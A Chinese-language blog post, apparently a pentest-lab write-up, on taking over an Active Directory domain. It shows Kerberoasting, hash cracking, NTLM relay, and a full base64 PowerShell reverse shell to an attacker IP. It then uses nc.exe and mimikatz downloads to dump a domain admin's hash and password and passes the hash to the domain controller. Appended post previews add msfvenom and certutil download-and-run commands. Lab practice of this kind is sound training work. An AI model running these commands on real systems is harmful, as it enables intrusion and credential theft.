BEYOND 公司之滲透測試(3) - 內部進階攻擊

-

BEYOND 公司之滲透測試(3)

內部進階攻擊


第二階段中當我們瀏覽 BloodHound 時有發現如下圖的枚舉,這意味著 daniela 可能可以成功登入到 INTERNALSRV1 這台機器上




所以直接使用之前學過的 Kerberoasting AD 攻擊來嘗試看看,參考連結如下
https://your-it-note.blogspot.com/2023/11/active-directory_9.html

指令 └─$ proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.119.240 beyond.com/john

輸入密碼後跟練習的一樣拿到了 daniela 的 HASH



依樣存下來,依據之前練習的一樣直接爆破吧,└─$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

順利破解出來了,密碼是 DANIelaRO123




順手記錄好習慣......




使用者都會習慣使用相同的密碼,讓我們先測試 WordPress 網站看看,可以登入且網站僅有他一個帳號並且是管理者權限




既然是管理者那就使用之前用過的外掛方式來拿該伺服器的權限,參考如下

https://your-it-note.blogspot.com/2023/08/sql-injection_25.html

直接安插 Reverse Shell Plugin 套件,做好後直接壓縮 wordpress.php.zip





上傳安裝後也啟動了




結果我們的 nc-9999 沒有進來




後來又嘗試了其他 Port 依然沒有結果,看來是 INTERNALSRV1 無法出外網的樣子

所以讓我們繼續查看 WordPress 上的相關設定,發現一個備份路徑檔

C:\xampp\htdocs\wordpress\wp-content\backup-migration-BV1emzfHrI



該路徑將用於儲存備份。我們可能會濫用此功能來強制對底層系統進行身份驗證。

讓我們在這裡暫停一下併計劃下一步。目前,有兩種有希望的攻擊媒介。

第一個是將惡意 WordPress 外掛程式上傳到 INTERNALSRV1。透過準備並上傳 Web shell 或反向 shell,我們也許能夠獲得底層系統上的程式碼執行,但試過了目前尚未成功。


對於第二個攻擊向量,我們必須再次查看 BloodHound 結果並做出一些假設。正如我們所發現的,本地管理員帳戶在 INTERNALSRV1 上有一個活動會話。根據此會話,我們可以假設此使用者帳戶用於執行 WordPress 實例。

此外,網域中多台電腦的本機管理員帳戶使用相同的密碼設定的情況是人的惰性。我們假設目標環境也是如此。我們也了解到,網域管理員 beccy 在 MAILSRV1 上有一個活動會話,因此該使用者的憑證可能會快取在系統上。


由於 SMB 簽章在 MAILSRV1 和 INTERNALSRV1 上被停用,如果我們可以強制進行身份驗證,則可能會發生中繼攻擊。


最後,我們確定了 WordPress 備份遷移外掛中的備份目錄路徑字段,其中包含備份目標的路徑。這可能允許我們強制執行此類身份驗證請求。


基於所有這些信息,我們來定義第二個攻擊向量的計畫。首先我們將嘗試透過濫用INTERNALSRV1 上備份遷移 WordPress 外掛程式的備份目錄路徑來強制發出身份驗證請求。透過設定 Kali 機器的目標路徑,可以使用 impacket-ntlmrelayx2 將傳入連線中繼到 MAILSRV1。如果我們的假設正確,則驗證請求是在 INTERNALSRV1 上的本機管理員帳戶上下文中發出的,該帳戶與 MAILSRV1 上的本機管理員帳戶具有相同的密碼。


如果此攻擊成功,我們將在 MAILSRV1 上獲得特權程式碼執行,然後我們可以利用它來提取 beccy 的 NTLM 雜湊值,從而滿足滲透測試的主要目標之一。

由於第二個攻擊向量不僅會導致在單一系統上執行程式碼,而且還提供了實現滲透測試目標之一的潛在向量,因此我們將首先執行中繼攻擊。

在修改 WordPress 外掛程式中的備份目錄路徑之前,讓我們先設定 impacket-ntlmrelayx 。我們將使用 --no-http-server 和 -smb2support 來停用 HTTP 伺服器並啟用 SMB2 支援。我們將指定 MAILSRV1 的外部位址 192.168.233.242 為中繼攻擊的目標。透過輸入外部位址,我們不必透過代理鏈代理我們的中繼攻擊。最後我們將對 PowerShell 反向 shell oneliner 3進行 Base64 編碼,它將連接回連接埠 9999 上的 Kali 機器,並將其作為命令提供給參數 -c。

可以參考之前練習的 "中繼(Relaying) Net-NTLMv2",連結如下

https://your-it-note.blogspot.com/2023/09/relaying-net-ntlmv2.html

攻擊前要先做到 oneliner 的 BASE64 reverse shell,文章內有手法都一樣,主要就這一段

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.217",9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'




轉好的 BASE64 如下

=========================================================================

JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA3ACIALAA5ADkAOQA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

=========================================================================

接著我們要在攻擊主機啟動 impacket-ntlmrelayx,指令 sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.233.242 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA3ACIALAA5ADkAOQA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="





將備份路徑改如下,IP 是 kali 中繼,test 是不存在的路徑



接著按 SAVE,網頁會寫路徑不存在




但去看 ntlm-relay 會發現進來了且成功轉過去 MailSRV1




接著看我們的 nc-9999,連線進來了且 whoami 是本機管理員跟預期的一樣




載 nc.exe 再執行多開一個 shell 到 kali 443

iwr -uri http://192.168.45.217:8000/nc.exe -Outfile nc.exe

wmic process call create "C:\users\administrattor\nc.exe 192.168.45.217 443 -de cmd.exe"




kali 443 Listen 如下圖




下載一定要的 mimikatz,iwr -uri http://192.168.45.217:8000/mimikatz.exe -Outfile mimikatz.exe





標準作業 .\mimikatz.exe,privilege::debug,sekurlsa::logonpasswords




我們最想要的 beccy 網域管理者 NTLM 出現了 f0397ec5af49971f6efbdb07877046b3

注意看下面直接提供了明文密碼 Password : NiftyTopekaDevolve6655!#!




順手記錄好習慣




直接橫向移動測試 DC 吧

proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.119.240

拿下 Domain Control 了













留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容